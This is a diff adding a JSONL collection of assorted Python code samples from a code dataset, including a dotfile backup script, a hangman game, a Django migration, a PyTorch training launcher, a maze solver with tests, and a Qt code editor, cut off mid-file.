diff --git "a/2389.jsonl" "b/2389.jsonl" new file mode 100644--- /dev/null +++ "b/2389.jsonl" @@ -0,0 +1,632 @@ +{"seq_id":"148678497","text":"#!/usr/bin/env python\n\nimport os\nimport sys\nimport logging\nimport argparse\nimport shutil\n\nfrom subprocess import call\n\n\ndef backup_atom(base_path, home):\n logger.info(\"Attempting to back up Atom settings...\")\n path = home + \"/.atom\"\n # do we even have an atom installation to back up?\n if os.path.isdir(path):\n # verify that the destination directory exists\n if not os.path.isdir(os.path.join(base_path + \"/atom\")):\n os.mkdir(os.path.join(base_path + \"/atom\"))\n\n files = []\n files_to_copy = []\n for (dirpath, dirnames, filenames) in os.walk(path):\n files.extend(filenames)\n # just want the first level\n break\n\n filetype = [\".json\", \".cson\", \".coffee\", \".less\"]\n for item in files:\n filename, file_extension = os.path.splitext(item)\n if file_extension in filetype:\n files_to_copy.append(item)\n\n for item in files_to_copy:\n logger.debug(\"Copying {}...\".format(item))\n logger.debug(os.path.join(base_path, \"atom\"))\n shutil.copyfile(os.path.join(path + \"/\" + item),\n os.path.join(base_path + \"/atom/\" + item))\n\n os.chdir(os.path.join(base_path + \"/atom\"))\n # call gets annoyed if we don't create the file first\n open(os.path.join(base_path + \"/atom/packages.list\"), 'w').close\n call(\"apm list --installed --bare > {}/atom/packages.list\".\n format(base_path), shell=True)\n\n logger.info(\"Successfully backed up Atom settings!\")\n\n else:\n logger.info(\"Unable to locate ~/.atom, skipping\")\n\n\ndef backup_bashrc(base_path, home):\n logger.debug(\"Attempting to back up .bashrc...\")\n shutil.copyfile(os.path.join(home + \"/.bashrc\"),\n os.path.join(base_path + \"/\" + \"bashrc\"))\n logger.info(\"Successfully backed up .bashrc!\")\n\n\ndef backup_gitconfig(base_path, home):\n logger.debug(\"Attempting to back up .gitconfig...\")\n shutil.copyfile(os.path.join(home + \"/.gitconfig\"),\n os.path.join(base_path + \"/\" + \"gitconfig\"))\n logger.info(\"Successfully backed up .gitconfig!\")\n\n\ndef backup(base_path, home):\n backup_atom(base_path, home)\n backup_bashrc(base_path, home)\n backup_gitconfig(base_path, home)\n\n\ndef restore(base_path, home):\n # for atom\n # apm install --packages-file packages.list\n pass\n\n\ndef main(argv):\n base_path = os.path.dirname(os.path.realpath(__file__))\n home = os.path.expanduser(\"~\")\n logger.debug(\"Currently running at: {}\".format(base_path))\n\n parser = argparse.ArgumentParser(\n description='Backup and restore Linux dotfiles.')\n parser.add_argument('-b', '-backup',\n help=\"Backup dotfiles from current system.\",\n action=\"store_true\")\n parser.add_argument('-r', '-restore',\n help=\"Restore dotfiles from the working directory.\",\n action=\"store_true\")\n\n args = parser.parse_args()\n if args.b == args.r:\n logger.error(\"You need to select only one of the options.\")\n sys.exit(1)\n\n if args.b is True:\n backup(base_path, home)\n elif args.r is True:\n restore(base_path, home)\n\n\nif __name__ == '__main__':\n\n logger = logging.getLogger('dotfile_manager')\n logger.setLevel(logging.DEBUG)\n ch = logging.StreamHandler()\n formatter = logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n ch.setFormatter(formatter)\n logger.addHandler(ch)\n\n main(sys.argv)\n","sub_path":"dotfile_manager.py","file_name":"dotfile_manager.py","file_ext":"py","file_size_in_byte":3591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"190861944","text":"import tkinter as tk\nfrom tkinter import messagebox\n\n\nclass HelloWorldApp(tk.Frame):\n # 初期化\n def __init__(self, master=None):\n tk.Frame.__init__(self, master, width=240, height=240)\n\n self.master.title('Hello World')\n \n self.label = tk.Label(self, text='Hello World')\n self.label.place(x=20, y=100, width=200, height=40) \n\n \n # ラベル1の生成\n label1 = tk.Label(self, text='ラベル1◎◎◎◎', bg='LightSkyBlue')\n label1.place(x=10, y=10)\n \n # ラベル2の生成\n label2 = tk.Label(self, text='ラベル2◎◎', bg='LightSkyBlue')\n label2.place(x=120, y=10)\n \n # ラベル3の生成\n label3 = tk.Label(self, text='ラベル3◎◎◎', bg='LightSkyBlue')\n label3.place(x=10, y=50) \n \n # ボタンの生成\n self.button = tk.Button(self, text='OK', command=self.on_click) \n self.button.place(x=20, y=200, width=200, height=40)\n \n # クリック時に呼ば���る\n def on_click(self):\n messagebox.showinfo('情報', 'ボタンをクリックしました') \n\n\nif __name__ == '__main__':\n app= HelloWorldApp()\n app.pack()\n app.mainloop()","sub_path":"python/tkinter/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"220299122","text":"from django.db import models, migrations\nfrom django.conf import settings\n\nfrom social_core.utils import setting_name\n\nfrom ..storage import DjangoCodeMixin\n\nUSER_MODEL = getattr(settings, setting_name('USER_MODEL'), None) or \\\n getattr(settings, 'AUTH_USER_MODEL', None) or \\\n 'auth.User'\n\n\nclass Migration(migrations.Migration):\n replaces = [\n ('default', '0002_add_related_name'),\n ('social_auth', '0002_add_related_name')\n ]\n\n dependencies = [\n ('social_django', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Code',\n fields=[\n ('id', models.AutoField(\n verbose_name='ID', serialize=False, auto_created=True,\n primary_key=True)),\n ('email', models.EmailField(max_length=75)),\n ('code', models.CharField(max_length=32, db_index=True)),\n ('verified', models.BooleanField(default=False)),\n ],\n options={\n 'db_table': 'social_auth_code',\n },\n bases=(models.Model, DjangoCodeMixin),\n ),\n migrations.AlterField(\n model_name='usersocialauth',\n name='user',\n field=models.ForeignKey(\n related_name='social_auth', to=USER_MODEL, on_delete=models.CASCADE,\n )\n ),\n migrations.AlterUniqueTogether(\n name='code',\n unique_together={('email', 'code')},\n ),\n ]\n","sub_path":"social_django/migrations/0002_add_related_name.py","file_name":"0002_add_related_name.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"261053431","text":"import re\nx = []\nfor line in open('logfile.log'):\n t = int(line)\n x.append(t)\n\nlinenum = -1\ni = 0\nn = -1\nh = []\nfor line in open('conv_2_test_rom.coe'):\n linenum += 1\n if linenum < 2:\n continue\n if i % 16 == 0:\n h.append([])\n n = n + 1\n if linenum < 64:\n print(line,end='')\n t = int(re.split(',|;',line)[0],base=16)\n t -= (0 if t < 0x7F else 0x100)\n h[n].append(t)\n i = i + 1\n\ndef dot(x,y):\n return sum([x[i]*y[i] for i in range(len(x))])\n\nn = 0\ni = 0\niternum = 0\nps = [0]*45\nwhile n < 4:\n xx = x[i:i+16]\n y = dot(xx,h[n])\n psi = iternum % 45\n ps[psi] += y\n res = ps[psi]\n print('iternum: {0}, n: {3}, i: {2}, y: {1}, ps[{5}]: {4}'.format(iternum,y,i,n,res,psi))\n i = i + 1\n iternum += 1\n if iternum % 45 == 0:\n i = i + 15\n n = n + 1\n\nprint(ps)\n","sub_path":"vhdl/helpers/conv_2/whole.py","file_name":"whole.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"418177556","text":"#encoding: UTF-8\n\n# Autor: Nazdira Abigail Cerda deL Prado, A01375428\n# Descripcion: Convierte de coordenadas cartesianas a coordenadas polares y calcula la magnitud de \"r\" preguntando al usuario los valores de \"x\" y \"y\"\n\n# A partir de aquí escribe tu programa\n\nx1=int(input(\"Insertar valor de x:\"))\ny1=int(input(\"Insertar valor de y:\"))\n\nimport math\nangulo= math.atan2(y1,x1)\nmagnitud=((x1**2)+(y1**2))**0.5\nanguloc=(angulo*180)/3.1416\n\nprint(\"Magnitud:\")\nprint(magnitud)\nprint(\"Angulo:\")\nprint(anguloc)","sub_path":"coordenadas.py","file_name":"coordenadas.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"60101793","text":"import os\r\nimport time\r\nimport torch\r\nimport torch.optim as optim\r\nfrom torch.utils.data import DataLoader\r\nfrom torch.optim.lr_scheduler import ReduceLROnPlateau\r\nfrom net_model import NetworkModel\r\nfrom net_work import Network\r\nfrom net_utils import NetUtils\r\nfrom tensorboardX import SummaryWriter\r\nfrom dataset_generator import DatasetGenerator\r\n\r\nclass LaunchNetwork:\r\n\r\n def __init__(self, args):\r\n\r\n print('Preparing network...')\r\n os.environ['CUDA_VISIBLE_DEVICES'] = '0'\r\n self.launcher(args)\r\n\r\n\r\n def launcher(self, args):\r\n\r\n logs = self.set_logs(args)\r\n\r\n # ---- Get transformations\r\n\r\n netUtils = NetUtils()\r\n\r\n transform_train = netUtils.get_transformations(netUtils.TRANS_TYPE_TRAIN)\r\n transform_val = netUtils.get_transformations(netUtils.TRANS_TYPE_VAL)\r\n transform_test = netUtils.get_transformations(netUtils.TRANS_TYPE_TEST)\r\n\r\n # ---- Generate datasets and dataloaders\r\n\r\n img_db = args.get('path_db')\r\n batch_size = args.get('batch_size')\r\n\r\n dataset_train = DatasetGenerator(pathImageDirectory=img_db, pathDatasetFile=args.get('path_train'), transform=transform_train)\r\n dataset_val = DatasetGenerator(pathImageDirectory=img_db, pathDatasetFile=args.get('path_val'), transform=transform_val)\r\n dataset_test = DatasetGenerator(pathImageDirectory=img_db, pathDatasetFile=args.get('path_test'), transform=transform_test)\r\n\r\n dataloader_train = DataLoader(dataset=dataset_train, batch_size=batch_size, \\\r\n shuffle=True, num_workers=0, pin_memory=False)\r\n dataloader_val = DataLoader(dataset=dataset_val, batch_size=batch_size, \\\r\n shuffle=True, num_workers=0, pin_memory=False)\r\n dataloader_test = DataLoader(dataset=dataset_test, batch_size=batch_size,\r\n shuffle=False, num_workers=0, pin_memory=False)\r\n\r\n # ---- MNIST data loader\r\n\r\n # transform_cifar = netUtils.get_transformations(netUtils.TRANS_TYPE_MNIST)\r\n\r\n # trainset = torchvision.datasets.CIFAR10('./tmp', train=True, download=True, transform=transform_cifar)\r\n # dataloader_train = torch.utils.data.DataLoader(trainset, batch_size=batch_size, shuffle=True, num_workers=0)\r\n\r\n # valset = torchvision.datasets.CIFAR10('./tmp', train=False, download=True, transform=transform_cifar)\r\n # dataloader_val = torch.utils.data.DataLoader(valset, batch_size=batch_size, shuffle=True, num_workers=0)\r\n\r\n # testset = torchvision.datasets.CIFAR10('./tmp', train=False, download=True, transform=transform_cifar)\r\n # dataloader_test = torch.utils.data.DataLoader(testset, batch_size=batch_size, shuffle=False, num_workers=0)\r\n\r\n class_dist_train = dataset_train.getClassDistribution()\r\n\r\n # ---- Model\r\n networkModel = NetworkModel()\r\n model = networkModel.get_network_model(args.get('net_model'),\r\n args.get('class_num'),\r\n args.get('net_is_trained'),\r\n args.get('net_activation'))\r\n model = torch.nn.DataParallel(model).cuda()\r\n\r\n # ---- Save model chart\r\n writer = SummaryWriter(args.get('path_summary'), comment=args.get('net_model'))\r\n for i, (input, target) in enumerate(dataloader_train):\r\n writer.add_graph(model, (input,))\r\n break\r\n\r\n # ---- Optimizer and scheduler\r\n\r\n optimizer = optim.Adam(model.parameters(), lr=0.0001, betas=(0.9, 0.999), \\\r\n eps=1e-08, weight_decay=1e-5)\r\n scheduler = ReduceLROnPlateau(optimizer, factor=0.1, patience=5, mode='min')\r\n\r\n # ---- Set loss\r\n loss_fx = netUtils.get_loss(args.get('net_loss'), weights=class_dist_train)\r\n\r\n # -------------TRAINING-------------\r\n network = Network()\r\n # network.train(dataloader_train, dataloader_val, model,\r\n # args.get('net_epoch'), loss_fx,\r\n # optimizer, scheduler, logs.get('path_model'),\r\n # logs.get('path_log'), args.get('path_summary'))\r\n\r\n # ---- Get the best model\r\n model_check = torch.load(os.path.join(args.get('path_model'), 'm-21122018-065015.pth.tar'))\r\n model.load_state_dict(model_check['state_dict'])\r\n\r\n # ---- Launch testing\r\n loss_val, acc, auroc, f1, mcc, spec, sen = network.test(dataloader_test, model, loss_fx, args.get('class_num'),\r\n logs.get('path_acc'), logs.get('path_pred'),\r\n args.get('path_summary'))\r\n file_log = open(logs.get('path_test'), 'w')\r\n file_log.write(\"loss: \" + str(loss_val.item()) + \" acc: \" + str(acc)\r\n + \" auroc: \" + str(auroc) + \" f1: \" + str(f1) + \" mcc: \" + str(mcc)\r\n + \" specificity: \" + str(spec) + \" sensitivity: \" + str(sen))\r\n file_log.flush()\r\n file_log.close()\r\n\r\n def set_logs(self, args):\r\n timestamp_time = time.strftime(\"%H%M%S\")\r\n timestamp_date = time.strftime(\"%d%m%Y\")\r\n timestamp_start = timestamp_date + '-' + timestamp_time\r\n\r\n name_model = 'm-' + timestamp_start + '.pth.tar'\r\n name_log = 'log-' + timestamp_start + '.txt'\r\n name_test = 'test-' + timestamp_start + '.txt'\r\n name_acc = 'acc-' + timestamp_start + '.txt'\r\n name_pred = 'pred-' + timestamp_start + '.txt'\r\n\r\n path_model = os.path.join(args.get('path_model'), name_model)\r\n path_log = os.path.join(args.get('path_log'), name_log)\r\n path_test = os.path.join(args.get('path_log'), name_test)\r\n path_acc = os.path.join(args.get('path_acc'), name_acc)\r\n path_pred = os.path.join(args.get('path_pred'), name_pred)\r\n\r\n file_log = open(path_log, 'w')\r\n file_log.write('DATABASE: ' + args.get('path_db'))\r\n file_log.write('\\nFILE-TRAIN: ' + args.get('path_train'))\r\n file_log.write('\\nFILE-VAL: ' + args.get('path_val'))\r\n file_log.write('\\nFILE-TEST: ' + args.get('path_test'))\r\n file_log.write('\\nOUT-MODEL: ' +path_model)\r\n file_log.write('\\nOUT-LOG: ' + path_log)\r\n file_log.write('\\nOUT-ACC: ' + path_acc)\r\n file_log.write('\\nOUT-PRED: ' + path_pred)\r\n file_log.write('\\nOUT-SUMMARY: ' + args.get('path_summary'))\r\n file_log.write('\\nNETWORK: ' + args.get('net_model'))\r\n file_log.write('\\nDIMENSION: ' + str(args.get('class_num')))\r\n file_log.write('\\nIS-TRAINED: ' + str(args.get('is_trained')))\r\n file_log.write('\\nLOSS: ' + args.get('net_loss'))\r\n file_log.write('\\nACTIVATION: ' + args.get('net_activation'))\r\n file_log.write('\\nTRANS-RESIZE: ' + str(args.get('trans_resize')))\r\n file_log.write('\\nTRANS-CROP: ' + str(args.get('trans_crop')))\r\n file_log.write('\\nBATCH: ' + str(args.get('batch_size')))\r\n file_log.write('\\nEPOCHS: ' + str(args.get('net_epoch')))\r\n file_log.write('\\n\\n')\r\n file_log.flush()\r\n file_log.close()\r\n\r\n return {\r\n 'path_model': path_model,\r\n 'path_log' : path_log,\r\n 'path_acc' : path_acc,\r\n 'path_pred' : path_pred,\r\n 'path_test' : path_test\r\n }\r\n","sub_path":"launch_network.py","file_name":"launch_network.py","file_ext":"py","file_size_in_byte":7460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"154444086","text":"import gender_guesser.detector as gender\r\nimport pandas as pd\r\n\r\nd = gender.Detector()\r\ndef no_mostly(name):\r\n try:\r\n if name == \"FIRST NAME\":\r\n raise Exception\r\n res = d.get_gender(name.title())\r\n if \"mostly\" in res:\r\n res = res[7:]\r\n elif res == \"andy\":\r\n res = \"unknown\"\r\n return res\r\n except:\r\n return \"error\"\r\n\r\ndf = pd.read_csv(\"salaries.csv\")\r\ndf[\"Gender\"] = df[\"0\"].apply(no_mostly)\r\n\r\ndf.to_csv(\"virginia_salaries.csv\")\r\n","sub_path":"determine_gender.py","file_name":"determine_gender.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"40293368","text":"# Helper class that takes a non-batched dataset reader and makes it batched, by merging multiple items via a merging\n# function that is provided by the user.\nfrom __future__ import annotations\nfrom overrides import overrides\nfrom abc import abstractmethod\nfrom collections.abc import Iterable\nfrom typing import Tuple, List\nfrom ..batched_dataset_reader import BatchedDatasetReader\nfrom ..compound_dataset_reader import CompoundDatasetReader, CompoundDatasetEpochIterator\nfrom ..dataset_reader import DatasetReader\nfrom ..dataset_types import *\n\nclass MergeBatchedDatasetEpochIterator(CompoundDatasetEpochIterator):\n\t@overrides\n\tdef __getitem__(self, ix):\n\t\tindex = self.indexFn(ix)\n\t\tif isinstance(index, slice):\n\t\t\tindex = np.arange(index.start, index.stop)\n\t\tif isinstance(index, (int, np.integer)):\n\t\t\tindex = [index]\n\t\tassert isinstance(index, Iterable), \"Got type: %s\" % type(index)\n\n\t\tlistItems = [self.baseIterator[j] for j in index]\n\t\tassert len(listItems) == self.batchLens[ix]\n\t\titems = self.reader.mergeFn(listItems)\n\t\treturn items, len(listItems)\n\nclass MergeBatchedDatasetReader(CompoundDatasetReader):\n\tdef __init__(self, baseReader:DatasetReader, mergeFn:Callable[[List[DatasetItem]], DatasetItem], batchesFn=None):\n\t\ttry:\n\t\t\tbatches = baseReader.getBatches()\n\t\t\talreadyBatched = True\n\t\texcept Exception as e:\n\t\t\talreadyBatched = False\n\t\tassert not alreadyBatched, \"[MergeBatchDatasetReader] Already a batched dataset, sir!\"\n\t\tsuper().__init__(baseReader)\n\n\t\tif batchesFn is None:\n\t\t\tdef f():\n\t\t\t\tassert False, \"Must be provided or overridden somewhere\"\n\t\t\tbatchesFn = f\n\n\t\tself.mergeFn = mergeFn\n\t\tself.batchesFn = batchesFn\n\n\tdef getBatches(self):\n\t\treturn self.batchesFn()\n\n\tdef iterateOneEpoch(self):\n\t\treturn MergeBatchedDatasetEpochIterator(self)\n\n\tdef __len__(self):\n\t\tret = super().__len__()\n\t\treturn ret\n\n\tdef __str__(self) -> str:\n\t\tsummaryStr = \"[MergeBatchedDatasetReader]\"\n\t\tsummaryStr += \"\\n %s\" % str(self.baseReader)\n\t\treturn summaryStr\n\n","sub_path":"neural_wrappers/readers/batched_dataset_reader/merge_batched_dataset_reader.py","file_name":"merge_batched_dataset_reader.py","file_ext":"py","file_size_in_byte":1971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"384336376","text":"import requests, json, datetime\n\n# Send initial request to get response with keys 'interval' and 'datestamp'\nurl = \"http://challenge.code2040.org/api/dating\"\nr = requests.post(url, json = {'token' : 'f0b70d2efbd8fe9e76312ac0d1a68c16'})\ndata = json.loads(r.text)\n\n# Store values from the dictionary into the dateGiven and interval variables\ndateGiven = data[\"datestamp\"]\ninterval = data[\"interval\"]\n\n# These values will be used to create a datetime object.\n# Once we have the datetime object, we can use timedelta to add interval to our date\nyear = dateGiven[:4]\nmonth = dateGiven[5:7]\nday = dateGiven[8:10]\nhour = dateGiven[11:13]\nminute = dateGiven[14:16]\nsecond = dateGiven[17:19]\n\n# datetime object from the values of the ISO 8601 format we were given\nisoToDatetime = datetime.datetime(int(year), int(month), int(day), int(hour), int(minute), int(second))\n\n# Add the interval to a the variable we will return, called datestamp\ninterval = datetime.timedelta(seconds=interval)\ndatestamp = isoToDatetime + interval\ndatestamp = datestamp.isoformat()\n\n# Append \"Z\" to the end of the datestamp because the isoformat()\n# function did not identically convert to the format we were given\ndatestamp += \"Z\"\n\n# Send final request with token and the new date in identical format to what we were given\nurl = \"http://challenge.code2040.org/api/dating/validate\"\nr = requests.post(url, json = {'token': 'f0b70d2efbd8fe9e76312ac0d1a68c16', 'datestamp' : datestamp})","sub_path":"step5.py","file_name":"step5.py","file_ext":"py","file_size_in_byte":1450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"491470876","text":"import unittest\nimport os\nfrom pathlib import Path\nimport itertools\n\nfrom StateSpaceSearch import (StateSpaceSearch, Maze, MazeLayout, SearchState, Movement, Move)\n\nclass JumpingLabyrinth( StateSpaceSearch, Maze ):\n\tdef __init__( self, mazeLayout, constraintList, mazeName=None ):\n\t\tMaze.__init__( self, mazeLayout, mazeName )\n\t\t\n\t\tself.allowedMovementCodes = Movement.horizontalOrVerticalMovementCode\n\t\tself.emptyCellToken, self.blockedCellToken, self.startCellToken, self.targetCellToken = '.', '#', 'S', 'T'\n\t\tself.blockedCells = set()\n\n\t\trows, cols = self.getDimensions()\n\t\tfor row, col in itertools.product( range( rows ), range( cols ) ):\n\t\t\ttoken = self.mazeLayout.getRaw( row, col )\n\t\t\tif token == self.startCellToken:\n\t\t\t\tself.startCell = (row, col)\n\t\t\telif token == self.targetCellToken:\n\t\t\t\tself.targetCell = (row, col)\n\t\t\telif token == self.blockedCellToken:\n\t\t\t\tself.blockedCells.add( (row, col) )\n\t\t\telse:\n\t\t\t\tassert token == self.emptyCellToken\n\n\t\t# For a given jump length, we store the next allowed jump length in self.distanceDict.\n\t\tself.distanceDict = dict()\n\t\tfor i in range( len( constraintList ) ):\n\t\t\tself.distanceDict[ constraintList[ i ] ] = constraintList[ ( i + 1 ) % len( constraintList ) ]\n\t\t# Initial jump length is stored in self.distanceDict[ None ].\n\t\tself.distanceDict[ None ] = constraintList[ 0 ]\n\n\tdef getAdjacentStateList( self, currentState ):\n\t\tadjacentStateList = list()\n\n\t\tdistance = self.distanceDict[ None ] if currentState.previousMove is None else \\\n\t\t self.distanceDict[ currentState.previousMove.moveDistance ]\n\n\t\trow, col = currentState.cell\n\t\tfor directionTag, (du, dv) in self.allowedMovementCodes.items():\n\t\t\t# We have to move 'distance' units in the given direction. Each cell in our direction of\n\t\t\t# movement should be unblocked and inside the maze.\n\t\t\tfor delta in range( 1, distance + 1 ):\n\t\t\t\tnewCell = u, v = row + du * delta, col + dv * delta\n\t\t\t\tif self.isCellOutsideGrid( newCell ) or newCell in self.blockedCells:\n\t\t\t\t\tnewCell = None\n\t\t\t\t\tbreak\n\t\t\tif newCell is not None:\n\t\t\t\tmove = Move( moveCode=directionTag, moveDistance=distance )\n\t\t\t\tnewSearchState = SearchState( newCell, previousMove=move, previousState=currentState )\n\t\t\t\tadjacentStateList.append( newSearchState )\n\t\t\n\t\treturn adjacentStateList\n\n\tdef getCacheEntryFromSearchState( self, searchState ):\n\t\treturn (searchState.cell, None if searchState.previousMove is None else searchState.previousMove.moveDistance)\n\n\tdef getStartState( self ):\n\t\treturn SearchState( self.startCell, previousMove=None, previousState=None )\n\n\tdef isTargetState( self, currentState ):\n\t\treturn currentState.isTargetState( self.targetCell )\n\n\tdef solve( self ):\n\t\tsearchState = self.breadthFirstSearch()\n\t\tpathString, _ = self.getPath( searchState )\n\n\t\treturn pathString\n\nclass JumpingLabyrinthTest( unittest.TestCase ):\n\tdef _readMaze( self, filename ):\n\t\tdataChunkList = list()\n\t\twith open( 'tests/JumpingLabyrinth/{}'.format( filename ) ) as inputFile:\n\t\t\tfor inputLine in inputFile.readlines():\n\t\t\t\tdataChunkList.append( inputLine.strip() )\n\t\tmazeLayout = dataChunkList[ : -1 ]\n\t\tconstraintList = list( map( int, dataChunkList[ -1 ].split( ',' ) ) )\n\t\treturn mazeLayout, constraintList\n\n\tdef _render( self, mazeLayout, mazeName, pathString, pathLength ):\n\t\tprint( 'JumpingLabyrinth: mazeName = {}'.format( mazeName ) )\n\t\tfor mazeRow in mazeLayout:\n\t\t\tprint( mazeRow )\n\t\tprettyPathString = ''.join( map( lambda token : token.strip(), pathString.split( ':' ) ) )\n\t\tprint( 'Path : {} Length = {}'.format( prettyPathString, pathLength ) )\n\t\tprint()\n\n\tdef _verify( self, testcaseFile, expectedSolutionDict ):\n\t\tmazeLayout, constraintList = self._readMaze( testcaseFile )\n\t\tmazeName = testcaseFile\n\t\tjumpingLabyrinth = JumpingLabyrinth( MazeLayout( mazeLayout ), constraintList, mazeName=mazeName )\n\t\tpathString = jumpingLabyrinth.solve()\n\n\t\tpathLength = len( pathString.split( ':' ) )\n\t\tself._render( mazeLayout, mazeName, pathString, pathLength )\n\n\t\tself.assertEqual( pathLength, expectedSolutionDict[ testcaseFile ] )\n\n\tdef _readSolutionFile( self, solutionFileName ):\n\t\texpectedSolutionDict = dict()\n\t\twith open( 'tests/JumpingLabyrinth/{}.ans'.format( solutionFileName ) ) as solutionFile:\n\t\t\tfor solutionLine in solutionFile.readlines():\n\t\t\t\ttestcaseFile, expectedMoveCount = solutionLine.strip().split( ':' )\n\t\t\t\texpectedSolutionDict[ testcaseFile.strip() ] = int( expectedMoveCount )\n\t\treturn expectedSolutionDict\n\n\tdef test_solve( self ):\n\t\ttestcaseFiles = set()\n\t\tfor testcaseFile in os.listdir( 'tests/JumpingLabyrinth' ):\n\t\t\ttestcaseFiles.add( Path( testcaseFile ).stem )\n\n\t\tsolutionFileName = 'Solution'\n\t\ttestcaseFiles.remove( solutionFileName )\n\t\texpectedSolutionDict = self._readSolutionFile( solutionFileName )\n\t\t\n\t\tfor testcaseFile in testcaseFiles:\n\t\t\tself._verify( testcaseFile, expectedSolutionDict )\n\nif __name__ == '__main__':\n\tunittest.main()","sub_path":"MazeMania/LogicMaze/JumpingLabyrinth.py","file_name":"JumpingLabyrinth.py","file_ext":"py","file_size_in_byte":4876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"28943642","text":"nums = list(map(int, input(\"입력: \").rstrip().split(',')))\nmax_num = nums[0]\nfor num in nums:\n max_num = num if num > max_num else max_num \nprint(max_num)\n\n# 걍 max(nums) 로 해도 됨. (max() : 요소들 중에서 가장 큰 값 반환) \n\n\"\"\"\n리스트의 요소중에서 가장 큰 값을 반환하는 코드,\n이렇게 보다는 파이썬 내장함수인 max(), min()등을 활용하자.\n\"\"\"\n","sub_path":"_2 파이썬 문법정리 파일(구버전)/3/06-(요소중최댓값).py","file_name":"06-(요소중최댓값).py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"255986532","text":"import random, linecache,re, os, time\nfrom draw import draw\n\n# Initialize necessary variable for this game\ntrial = []\nerrorNumber = 0\n\n# Restart the program after finished the game\ndef restartGame():\n time.sleep(5)\n os.system(\"python main.py\")\n exit()\n\n# Make clear screen easier to read\ndef clearScreen():\n os.system('clear')\n\n# Re-format the list to look more like a hangman game\ndef formatList(name):\n print(' '.join(name))\n\n# Show the current status of the game, includes the number of trials, and number of errors\ndef currentStatus():\n print(\"Current Status of Game\\n\")\n formatList(test)\n print(\"\\nYour previous guess is following: \"+', '.join(trial))\n\n# Check if the user input in the answer. If so update the test status, if not update the error number\ndef checkInput(input):\n global errorNumber\n outcome = [i for i, x in enumerate(answer) if x==input.upper()]\n if len(outcome) > 0:\n for x in range(0, len(outcome)):\n test[outcome[x]] = input.upper()\n else:\n errorNumber += 1\n draw(errorNumber)\n\n# Retrive the word randomly from the words.txt file\nword = linecache.getline('words.txt', random.randint(1, 81)).rstrip('\\n')\n\n# Make the word into a list for further usage\nanswer = list(word.upper())\n\n# Duplicate another list that can compare with the anwer and shows on the screen\ntest = answer.copy()\nfor x in range(0, len(test)):\n test[x] = \"_\"\n\nclearScreen()\n\n# The game starts here\nprint(\"Welcome to Hangman Game! Let's test your vocabulary!\\n\")\nprint(\"Hint: This is a %s-letter word.\\n\" %len(test))\nformatList(test)\n\n# The game will keep running until the user get the final answer or get 8 errors\n# User can only input from a to z, and only can input 1 letter\n# Otherwise, it will notice user by error message\nwhile errorNumber < 8 and test!=answer:\n userInput = input(\"\\nPlease guess the letter in this word: \")\n if re.match(\"^[a-z]*$\", userInput) and len(userInput) == 1:\n if userInput.upper() not in trial:\n trial.append(userInput.upper())\n checkInput(userInput)\n clearScreen()\n currentStatus()\n else:\n print(\"\\nYou already try %s before\" % userInput.upper())\n continue\n else:\n print(\"\\nPlease input only 1 letter and from a to z\")\n continue\n\n# Test if user win or lose the game\nif test!=answer:\n print(\"Sorry, you lose. But I believe you can make it next time!\")\nelse:\n print(\"\\nYes,you win. You are the Wordsmith!\")\n\nrestartGame()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"365254535","text":"# --- Das Textfeld mit den Zeilennummern stammt von eyllanesc mit leichten Veränderungen von mir. --- #\n# --- https://stackoverflow.com/questions/50074155/how-to-add-line-number-in-this-texteditor --- #\n# --- MIT-Lizenz (frei Benutzung) --- #\n\n\nfrom PyQt5.QtWidgets import QWidget, QPlainTextEdit, QTextEdit\nfrom PyQt5.QtGui import QColor, QTextFormat, QPainter, QFont\nfrom PyQt5.QtCore import QRect, pyqtSlot, Qt, QSize\n\n\nclass LineNumberArea(QWidget):\n def __init__(self, editor):\n QWidget.__init__(self, parent=editor)\n self.codeEditor = editor\n\n def sizeHint(self):\n return QSize(self.codeEditor.line_number_area_width(), 0)\n\n def paintEvent(self, event):\n self.codeEditor.line_number_area_paint_event(event)\n\n\nclass CodeEditor(QPlainTextEdit):\n def __init__(self, parent=None):\n QPlainTextEdit.__init__(self, parent)\n f = QFont(\"Consolas\", 14)\n f.setBold(True)\n self.setFont(f)\n self.lineNumberArea = LineNumberArea(self)\n self.blockCountChanged.connect(self.updateline_number_area_width)\n self.updateRequest.connect(self.update_line_number_area)\n self.cursorPositionChanged.connect(self.highlight_current_line)\n self.updateline_number_area_width(0)\n self.highlight_current_line()\n\n def line_number_area_paint_event(self, event):\n painter = QPainter(self.lineNumberArea)\n painter.fillRect(event.rect(), Qt.lightGray)\n\n block = self.firstVisibleBlock()\n block_number = block.blockNumber()\n top = self.blockBoundingGeometry(block).translated(self.contentOffset()).top()\n bottom = top + self.blockBoundingRect(block).height()\n while block.isValid() and top <= event.rect().bottom():\n if block.isVisible() and bottom >= event.rect().top():\n number = str(block_number + 1)\n painter.setPen(Qt.black)\n painter.drawText(-2, top, self.lineNumberArea.width(),\n self.fontMetrics().height(),\n Qt.AlignRight, number)\n block = block.next()\n top = bottom\n bottom = top + 